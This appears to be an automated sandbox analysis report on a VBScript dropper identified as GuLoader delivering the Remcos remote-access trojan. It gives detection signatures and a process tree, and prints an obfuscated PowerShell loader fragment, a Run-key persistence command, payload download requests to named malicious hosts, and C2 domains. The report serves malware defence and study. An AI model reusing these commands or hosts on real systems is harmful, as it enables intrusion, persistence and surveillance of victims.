Windows Analysis Report
BKGCONF-THD1914129-BKGCONF-THD1914129.vbs

Overview

General Information

Sample name: BKGCONF-THD1914129-BKGCONF-THD1914129.vbs
Analysis ID: 1410613
MD5: 62362dc3fc9d67f81dd8bcd670e8c117
SHA1: c871994bee2042d4cac07220e283166c3f58aa3f
SHA256: e9144edc2096347981ed7ea94f6898cfd400918558cb0aba2f4edabbe472cf61
Tags: GuLoader, vbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2428 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1960 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <obfuscated PowerShell script> MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1628 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" <obfuscated PowerShell script, same as PID 1960> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • wab.exe (PID: 5548 cmdline: C:\Program Files (x86)\windows mail\wab.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wscript.exe (PID: 2300 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • WmiPrvSE.exe (PID: 5244 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
            • powershell.exe (PID: 5312 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <obfuscated PowerShell script> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • wab.exe (PID: 6380 cmdline: C:\Program Files (x86)\windows mail\wab.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5960 cmdline: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 6776 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • svchost.exe (PID: 4568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

No configs have been found

Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.2804880582.0000000008BF0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000005.00000002.2804900033.0000000008CCE000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Process Memory Space: powershell.exe PID: 1628 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
          • 0x537cf:$b2: ::FromBase64String(
          • 0x45a1a:$s1: -join

          System Summary

          Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , ProcessId: 2300, ProcessName: wscript.exe
          Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , ProcessId: 2300, ProcessName: wscript.exe
          Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", ProcessId: 2428, ProcessName: wscript.exe
          Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" , ProcessId: 2300, ProcessName: wscript.exe
          Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\obviously
          Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)", ProcessId: 6776, ProcessName: reg.exe
          Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), CommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Program Files (x86)\windows mail\wab.exe, ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5548, ParentProcessName: wab.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), ProcessId: 5960, ProcessName: cmd.exe
          Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems): Data: Details: %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\obviously
          Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs", ProcessId: 2428, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla 
,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessne
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4568, ProcessName: svchost.exe

          Stealing of Sensitive Information

          Source: File created Author: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 5548, TargetFilename: C:\ProgramData\remcos\logs.dat
          No Snort rule has matched

          AV Detection

          Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
          Source: rnnfibiteammony.duckdns.org Virustotal: Detection: 15%
          Source: tolatilbu.hopto.org Virustotal: Detection: 15%
          Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
          Source: unknown HTTPS traffic detected: 89.40.227.248:443 -> 192.168.2.5:49732 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49743 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 89.40.227.248:443 -> 192.168.2.5:49744 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49748 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49763 version: TLS 1.2

          Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

          Networking

          Source: unknown DNS query: name: rnnfibiteammony.duckdns.org
          Source: global traffic TCP traffic: 192.168.2.5:49745 -> 180.214.236.46:4848
          Source: Joe Sandbox View IP Address: 180.214.236.46
          Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic HTTP traffic detected: GET /wp-admin/Klassespecifikke.vbs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: maso.ge Cache-Control: no-cache
          Source: global traffic HTTP traffic detected: GET /zwDhHUJEmBIkUtXcwKsarX186.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: brustiaalfa.websin.it Cache-Control: no-cache
          Source: global traffic HTTP traffic detected: GET /wp-admin/gGzbBm204.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: maso.ge Cache-Control: no-cache
          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic HTTP traffic detected: GET /Produktionshallens.thn HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Mon, 18 Mar 2024 01:27:54 GMT User-Agent: Microsoft BITS/7.8 Host: brustiaalfa.websin.it
          Source: global traffic HTTP traffic detected: GET /wp-admin/Reciteret.rar HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Mon, 18 Mar 2024 01:22:31 GMT User-Agent: Microsoft BITS/7.8 Host: maso.ge
          Source: unknown DNS traffic detected: queries for: brustiaalfa.websin.it
          Source: powershell.exe, 00000005.00000002.2801177789.000000000709B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000005.00000002.2765789549.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microR
          Source: wscript.exe, 00000000.00000002.2217419966.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216201084.000001F01BC1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216774961.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2868545183.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: wscript.exe, 0000000A.00000003.2868545183.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: wscript.exe, 00000000.00000002.2217419966.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216201084.000001F01BC1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216774961.000001F01BC9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmer
          Source: svchost.exe, 00000006.00000003.2272203577.00000273EF130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BC3DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BAA2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BA681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
          Source: svchost.exe, 00000006.00000003.2431109761.00000273EF137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://brustiaalfa.websin.it/Produktionshallens.thn
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://brustiaalfa.websin.it/Produktionshallens.thnp
          Source: powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: svchost.exe, 00000006.00000003.2272203577.00000273EF1A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
          Source: svchost.exe, 00000006.00000003.2272203577.00000273EF130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
          Source: powershell.exe, 00000005.00000002.2768378131.0000000004867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2801177789.0000000007070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.2842855560.00000220BB5A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: svchost.exe, 00000006.00000003.2898965598.00000273EF13C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2928487797.00000273EF13F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maso.ge/wp-admin/Reciteret.rar
          Source: powershell.exe, 00000003.00000002.2900292990.00000220CA6EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2900292990.00000220CA830000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2842855560.00000220BA8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.0000000005776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

          E-Banking Fraud

          Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

          System Summary

          Source: Process Memory Space: powershell.exe PID: 1628, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Initial file: Monotellurite.ShellExecute Hjerteanfaldene,Feistiest,"","" ,Electrotype
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped file: Herthas117.ShellExecute Redningsaktioner,Goajiro71,"","" ,Mandehul
          Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5782
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 5782
          Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 5416
